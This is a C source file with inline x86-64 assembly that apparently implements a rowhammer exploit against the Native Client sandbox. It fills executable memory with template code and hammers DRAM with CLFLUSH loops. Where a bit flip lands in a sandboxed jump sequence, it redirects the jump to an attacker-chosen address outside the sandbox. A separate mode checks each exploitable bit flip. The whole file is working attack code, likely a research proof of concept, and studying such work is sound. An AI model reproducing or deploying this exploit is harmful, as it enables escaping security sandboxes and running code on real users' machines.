
#include <assert.h>
#include <setjmp.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>


/* Bounds of the template code whose copies are checked for bit flips.
   Defined outside this file (presumably in an assembly source — confirm). */
extern char template_start[];
extern char template_end[];

/* Address of the copy of the template currently being exploited. */
void *code_addr;
/* Sandbox base.  Under NaCl, main() reads it from %r15; outside NaCl,
   do_jump() loads this fake value into %r15. */
uint64_t mem_base = (uint64_t) 0x123 << 32;
/* Address do_jump() finally transfers control to. */
uint64_t jmp_dest;
/* Address a successful exploit is meant to reach. */
uint64_t evil_jmp_dest;
/* Value do_jump() loads into %rax before jumping. */
uint64_t rax;
/* Value do_jump() loads into %r14, %r13, %r11, %rdi, %rcx, %rdx and
   %rsp, i.e. the registers a flipped "add"/"jmp" operand may select. */
uint64_t add_val;
/* Flag selector (0-4) consumed by set_flags_part1().  test_flag_setting()
   also uses it to hold the flag byte read back with LAHF. */
uint32_t flags;
/* Resumption point: dest_func() longjmps here after a successful jump. */
jmp_buf g_jmp_buf;

/* %rsp saved by do_jump() and restored by dest_asm. */
uint64_t stack_ptr;

/* Landing pad for a successful exploit (used as evil_jmp_dest outside
   NaCl).  do_jump() overwrites %rsp with add_val before jumping, so this
   first restores the stack pointer that do_jump() saved in stack_ptr
   (sandboxed via naclrestsp under NaCl) and then jumps to dest_func.
   NOTE(review): dest_func is entered with "jmp" rather than "call", so
   %rsp has do_jump()'s alignment rather than the usual post-call
   alignment; this appears to be tolerated by dest_func's printf/longjmp,
   but confirm if dest_func grows. */
void dest_asm();
__asm__(".pushsection .text, \"ax\", @progbits\n"
        ".global dest_asm\n"
        "dest_asm:\n"
#if defined(__native_client__)
        "naclrestsp stack_ptr(%rip), %r15\n"
#else
        "movq stack_ptr(%rip), %rsp\n"
#endif
        "jmp dest_func\n"
        ".popsection\n");

/* Reached from dest_asm once an exploited jump has landed: report
   success and unwind to the setjmp() on g_jmp_buf.  Never returns. */
void dest_func() {
  printf("here\n");
  longjmp(g_jmp_buf, 1);
}

/* Masks for the arithmetic flags within the low byte of EFLAGS, i.e. the
   byte LAHF copies into %ah (see test_flag_setting). */
enum {
  kCFlag = 1 << 0, /* carry */
  kPFlag = 1 << 2, /* parity */
  kZFlag = 1 << 6, /* zero */
  kSFlag = 1 << 7, /* sign */
};

/* One indirect-jump site inside the template and how to reach it.
   Offsets are in bytes; bundles are 32 bytes (see try_exploit()). */
struct Jump {
  /* Where the jump is located. */
  int bundle;  /* Bundle number */
  int offset_in_bundle;  /* Offset in bytes */
  /* How to reach the jump, from a bundle start: */
  int jump_bundle;  /* Bundle to jump to */
  int flags;  /* Flags to set when jumping (selector for set_flags_part1()) */
};

/* Table describing how we can get to indirect jumps within our template.

   Each entry locates one 8-byte jump sequence (bundle number and byte
   offset inside that 32-byte bundle).  It also says how to steer
   execution onto it: jump to the start of bundle |jump_bundle| with the
   arithmetic flags chosen by the |flags| selector of set_flags_part1().
   NOTE(review): the offsets suggest bundle 0 has an 8-byte (2*4) lead-in
   and bundle 1 a 6-byte (2*3) lead-in before their first jump, with jumps
   packed 8 bytes apart.  The lead-in is presumably flag-testing branches
   in the template; confirm against the template source. */
const struct Jump jumps[] = {
  { .bundle = 0, .offset_in_bundle = 2*4 + 8*0, .jump_bundle = 0, .flags = 0 },
  { .bundle = 0, .offset_in_bundle = 2*4 + 8*1, .jump_bundle = 0, .flags = 1 },
  { .bundle = 0, .offset_in_bundle = 2*4 + 8*2, .jump_bundle = 0, .flags = 2 },

  { .bundle = 1, .offset_in_bundle = 2*3 + 8*0, .jump_bundle = 1, .flags = 0 },
  { .bundle = 1, .offset_in_bundle = 2*3 + 8*1, .jump_bundle = 0, .flags = 3 },
  { .bundle = 1, .offset_in_bundle = 2*3 + 8*2, .jump_bundle = 0, .flags = 4 },

  { .bundle = 2, .offset_in_bundle = 8*0, .jump_bundle = 2, .flags = 0 },
  { .bundle = 2, .offset_in_bundle = 8*1, .jump_bundle = 1, .flags = 1 },
  { .bundle = 2, .offset_in_bundle = 8*2, .jump_bundle = 1, .flags = 2 },
  { .bundle = 2, .offset_in_bundle = 8*3, .jump_bundle = 1, .flags = 3 },
};

/* Given that we have detected a change to |bit| in |byte|, this
   function determines whether this bit flip is exploitable.  If it is
   exploitable, this sets up state for exploiting that bit flip and
   returns true.  Otherwise, it returns false. */
int try_exploit(int byte, int bit) {
  int i;
  for (i = 0; i < sizeof(jumps) / sizeof(jumps[0]); i++) {
    const struct Jump *jump = &jumps[i];
    int start = jump->bundle * 32 + jump->offset_in_bundle;
    int jmp_seq_size = 8;
    if (byte >= start && byte < start + jmp_seq_size) {
      byte -= start;
      flags = jump->flags;
      jmp_dest = (uintptr_t) code_addr + jump->jump_bundle * 32;
      goto found;
    }
  }
  return 0;
 found:

  if (byte == 1 && bit < 3) {
    /* Dest reg in "and" changed. */
    rax = evil_jmp_dest - mem_base;
    return 1;
  }

  if ((byte == 3 && bit == 2) ||
      (byte == 5 && (bit >= 3 && bit < 6))) {
    /* %r15 in "add" changed. */
    rax = 0;
    add_val = evil_jmp_dest;
    return 1;
  }

  if (byte == 7 && bit < 3) {
    /* Dest reg in "jmp" changed. */
    rax = 0;
    add_val = evil_jmp_dest;
    return 1;
  }

  return 0;
}

/* Temporary variables used for setting flags: set_flags_part1() fills
   them in, and SET_FLAGS / set_flags_template compute flagval1 + flagval2
   so that the addition leaves the requested arithmetic flags set. */
int flagval1;
int flagval2;

/* SAHF isn't allowed under NaCl (due to a bug), so we have to use a
   more convoluted means for setting flags.

   Translate the |flags| selector into an operand pair whose 32-bit sum,
   computed later by SET_FLAGS or set_flags_template, sets the flag:
     1:  0 + 0     -> Z (zero)
     2: -1 + 0     -> S (signed)
     3:  3 + 0     -> P (parity)
     4: -1 + 0x11  -> C (carry; result wraps to 0x10)
     anything else: 1 + 0 -> none of Z/S/P/C */
void set_flags_part1() {
  static const int operand_pairs[5][2] = {
    {  1, 0    },
    {  0, 0    },
    { -1, 0    },
    {  3, 0    },
    { -1, 0x11 },
  };
  const int *pair = operand_pairs[flags < 5 ? flags : 0];
  flagval1 = pair[0];
  flagval2 = pair[1];
}

/* Assembly text that sets the arithmetic flags from flagval1 + flagval2
   (prepared by set_flags_part1()).  Overwrites %eax.  It addresses the
   variables RIP-relative, so it is used from code compiled in this file;
   set_flags_template is the %r15-relative variant. */
#define SET_FLAGS \
    "movl flagval1(%rip), %eax\n" \
    "addl flagval2(%rip), %eax\n" /* Sets arithmetic flags */

/* Template code for setting flags.  This is the same computation as
   SET_FLAGS, but it uses %r15-relative addressing and %ebx as the scratch
   register.  search_for_bit_flips() copies the bytes between the two
   labels into a dynamically created bundle. */
extern char set_flags_template[];
extern char set_flags_template_end[];
__asm__(".pushsection .text, \"ax\", @progbits\n"
        ".p2align 5\n"
        "set_flags_template:\n"
        "movl flagval1(%r15), %ebx\n"                           \
        "addl flagval2(%r15), %ebx\n" /* Sets arithmetic flags */
        "set_flags_template_end:\n"
        ".popsection\n");

void test_flag_setting() {
  int i;
  for (i = 0; i < 5; i++) {
    flags = i;
    set_flags_part1();
    __asm__ volatile(SET_FLAGS
                     "push %rax\n"
                     "lahf\n"
                     "mov %ah, flags(%rip)\n"
                     "pop %rax\n");
    int j;
    if (flags & kZFlag) { j = 1; }
    else if (flags & kSFlag) { j = 2; }
    else if (flags & kPFlag) { j = 3; }
    else if (flags & kCFlag) { j = 4; }
    else { j = 0; }
    assert(i == j);
  }
}

/* Print the exploit parameters, then transfer control to |jmp_dest| with
   the register state that try_exploit() prepared:
     %rax                              <- rax
     %r14, %r13, %r11, %rdi, %rcx, %rdx <- add_val
     %rsp                              <- add_val (via naclrestsp under NaCl)
     stack_ptr                         <- the current %rsp, for dest_asm
   Outside NaCl it also loads %r15 with mem_base and sets the arithmetic
   flags with SET_FLAGS.  Under NaCl, search_for_bit_flips() instead
   points |jmp_dest| at a stub that sets the flags, since nacljmp clobbers
   them.  The asm ends in an indirect jump and never falls through.
   Control comes back only through dest_asm/dest_func's longjmp, which is
   why the asm can get away with declaring no clobbers. */
void do_jump() {
  printf("dest_asm=%p\n", (void *) dest_asm);
  printf("evil_jmp_dest=0x%llx\n", (unsigned long long) evil_jmp_dest);
  printf("mem_base=0x%llx\n", (unsigned long long) mem_base);
  printf("rax=0x%llx\n", (unsigned long long) rax);

  set_flags_part1();

  __asm__ volatile(
#if !defined(__native_client__)
                   "movq mem_base(%rip), %r15\n"
                   SET_FLAGS
#endif
                   "movq rax(%rip), %rax\n"
                   /* Save rsp in case the "and" morphed to clobber it. */
                   "movq %rsp, stack_ptr(%rip)\n"
                   /* For cases where add is changed: */
                   "movq add_val(%rip), %r14\n"
                   "movq add_val(%rip), %r13\n"
                   "movq add_val(%rip), %r11\n"
                   "movq add_val(%rip), %rdi\n"
                   /* For cases where jmp is changed: */
                   "movq add_val(%rip), %rcx\n"
                   "movq add_val(%rip), %rdx\n"
#if defined(__native_client__)
                   "naclrestsp add_val(%rip), %r15\n"
#else
                   "movq add_val(%rip), %rsp\n"
#endif
                   /* Jump using %rbx as a scratch register. */
                   "mov jmp_dest(%rip), %rbx\n"
#if defined(__native_client__)
                   "nacljmp %ebx, %r15\n"
#else
                   "jmpq *%rbx\n"
#endif
                   );
}

#if defined(__native_client__)

#include "nacl_dyncode.h"

/* End of the static text segment; main() places the dynamic-code area
   after it (presumably linker-provided — confirm). */
extern char _etext[];
/* Code an exploit tries to reach under NaCl; main() derives
   evil_jmp_dest from it.  Not defined in this file. */
void func_entry();

/* Region filled with copies of the template and hammered by toggle(). */
char *dyncode_start;
char *dyncode_end;
/* Next free 32-byte slot for the flag-setting stubs. */
char *next_alloc;
/* Template size in bytes (template_end - template_start). */
int size;

/* Number of read/flush rounds per address set in toggle(). */
const int toggles = 540000;

/* Pick a random address within the dynamic code area
   [dyncode_start, dyncode_end).  The result is page-aligned provided the
   area's size is a multiple of 4096, which main() arranges by 64 KiB
   alignment.  The shift is done in size_t: shifting the int returned by
   rand() left by 12 overflows a signed int (undefined behavior) for most
   values. */
char *pick_addr() {
  size_t span = (size_t) (dyncode_end - dyncode_start);
  assert(span > 0);
  size_t offset = ((size_t) rand() << 12) % span;
  return dyncode_start + offset;
}

/* Do rowhammering.  |iterations| times:
   - pick |addr_count| random addresses in the dynamic-code area;
   - |toggles| times, read each address and then evict it with CLFLUSH,
     so the next read has to go back to memory.
   Previously the function overwrote |addr_count| with 2, ignoring the
   caller's value; it is now honored.  A non-positive count would make a
   zero-length array, so it is treated as "nothing to do". */
static void toggle(int iterations, int addr_count) {
  if (addr_count <= 0)
    return;

  int round;
  for (round = 0; round < iterations; round++) {
    volatile uint32_t *addrs[addr_count];
    int a;
    for (a = 0; a < addr_count; a++)
      addrs[a] = (volatile uint32_t *) pick_addr();

    int i;
    for (i = 0; i < toggles; i++) {
      /* Volatile reads: each one is a real memory access. */
      for (a = 0; a < addr_count; a++)
        (void) *addrs[a];
      for (a = 0; a < addr_count; a++)
        __asm__ volatile("clflush %0" : : "m" (*(int **) addrs[a]) : "memory");
    }
  }
}

/* Build a 32-byte bundle at |next_alloc| that sets the arithmetic flags
   (using the code between set_flags_template and set_flags_template_end)
   and then does a direct "jmp rel32" to |target|.  This is necessary
   because nacljmp clobbers flags.  Returns the stub's address and
   advances |next_alloc| past it. */
static uintptr_t emit_flag_stub(uint64_t target) {
  char buf[32];
  size_t tmpl_len = (size_t) (set_flags_template_end - set_flags_template);
  /* Template + 1-byte opcode + 4-byte displacement must fit the bundle. */
  assert(tmpl_len + 5 <= sizeof(buf));

  memset(buf, 0x90, sizeof(buf)); /* NOP fill */
  memcpy(buf, set_flags_template, tmpl_len);
  char *ptr = buf + tmpl_len;
  *ptr++ = (char) 0xe9; /* jmp rel32 */
  /* rel32 is relative to the end of the jmp instruction.  Stored with
     memcpy: |ptr| is unaligned and |buf| is a char array. */
  uint32_t rel = (uint32_t) (target - ((uintptr_t) next_alloc +
                                       (uintptr_t) (ptr + 4 - buf)));
  memcpy(ptr, &rel, sizeof(rel));

  int rc = nacl_dyncode_create(next_alloc, buf, sizeof(buf));
  assert(rc == 0);
  (void) rc;
  uintptr_t stub = (uintptr_t) next_alloc;
  next_alloc += sizeof(buf);
  return stub;
}

/* Compare every template copy in the dynamic-code area against the
   original.  For each differing bit, ask try_exploit() whether it is
   exploitable.  The first exploitable one gets a flag-setting stub and is
   jumped to via do_jump(); the process then exits. */
void search_for_bit_flips() {
  char *dest;
  for (dest = dyncode_start; dest + size <= dyncode_end; dest += size) {
    if (memcmp(dest, template_start, size) == 0)
      continue;
    printf("change found at %p\n", (void *) dest);

    int byte;
    for (byte = 0; byte < size; byte++) {
      int bit;
      for (bit = 0; bit < 8; bit++) {
        int mask = 1 << bit;
        if ((dest[byte] & mask) == (template_start[byte] & mask))
          continue;
        printf("change at byte %i, bit %i\n", byte, bit);
        code_addr = dest;
        if (!try_exploit(byte, bit)) {
          printf("no exploit known for this bit\n");
          continue;
        }
        printf("exploiting...\n");

        /* Route the jump through a stub that sets the flags first. */
        jmp_dest = emit_flag_stub(jmp_dest);

        if (!setjmp(g_jmp_buf)) {
          do_jump();
        }
        exit(0);
      }
    }
  }
}

/* NaCl entry point:
   - fill the dynamic-code area with copies of the template;
   - record the sandbox base (%r15) in mem_base;
   - alternate between checking for bit flips and hammering, forever
     (search_for_bit_flips() exits once an exploit is attempted). */
int main() {
  size = template_end - template_start;
  printf("size=%i\n", size);
  printf("_etext=%p\n", (void *) _etext);
  /* Dynamic code starts at the first 64 KiB boundary after static text.
     NOTE(review): 0x10000000 is assumed to be the end of the NaCl
     dynamic-code region — confirm. */
  dyncode_start = (char *) (((uintptr_t) _etext + 0xffff) & ~(uintptr_t) 0xffff);
  dyncode_end = (char *) 0x10000000;
  /* The first 64 KiB is kept out of the hammered region and handed out
     through |next_alloc|. */
  next_alloc = dyncode_start;
  dyncode_start += 0x10000;
  /* Cast: a pointer difference is ptrdiff_t, which %i does not match. */
  printf("dyncode size=%ld\n", (long) (dyncode_end - dyncode_start));

  /* Populate dyncode area. */
  char *dest;
  for (dest = dyncode_start; dest + size <= dyncode_end; dest += size) {
    int rc = nacl_dyncode_create(dest, template_start, size);
    assert(rc == 0);
  }

  __asm__ volatile("movq %r15, mem_base(%rip)");
  evil_jmp_dest = mem_base + (uintptr_t) func_entry;

  int iter = 0;
  for (;;) {
    search_for_bit_flips();

    printf("toggle %i\n", iter++);
    /* toggle(10, 8); */
    toggle(10, 2);
  }

  return 0;
}

#else

/* This gets used if we are running outside of NaCl.  This tests that
   we can correctly handle each possible bit flip in our template
   code.  For every (byte, bit) that try_exploit() accepts, it applies the
   flip to a fresh copy of the template in an RWX page and runs it via
   do_jump().  The run must reach dest_asm, which continues to dest_func
   and longjmps back here. */
int main() {
  /* Size of the RWX mapping the template is copied into. */
  const size_t kCodeSize = 0x1000;

  test_flag_setting();

  setvbuf(stdout, NULL, _IONBF, 0);

  code_addr = mmap(0, kCodeSize, PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
  assert(code_addr != MAP_FAILED);

  int size = template_end - template_start;
  printf("size=%i\n", size);
  /* The whole template is copied into the mapping below. */
  assert(size > 0 && (size_t) size <= kCodeSize);

  evil_jmp_dest = (uintptr_t) dest_asm;

  int matches = 0;

  int byte;
  for (byte = 0; byte < size; byte++) {
    int bit;
    for (bit = 0; bit < 8; bit++) {
      if (try_exploit(byte, bit)) {
        memcpy(code_addr, template_start, size);
        ((uint8_t *) code_addr)[byte] ^= 1 << bit;
        printf("mod byte %i, bit %i\n", byte, bit);

        /* Dump the whole modified template (every bundle, not just the
           first 32 bytes) so the bit flip can be inspected with:
             objdump -D -b binary -m i386:x86-64 tmp_data */
        FILE *fp = fopen("tmp_data", "wb");
        assert(fp != NULL);
        size_t written = fwrite(code_addr, (size_t) size, 1, fp);
        int close_rc = fclose(fp);
        assert(written == 1 && close_rc == 0);
        (void) written;
        (void) close_rc;

        if (!setjmp(g_jmp_buf)) {
          do_jump();
        }
        matches++;
      }
    }
  }

  printf("matches=%i\n", matches);
  assert(matches == 100);

  return 0;
}

#endif
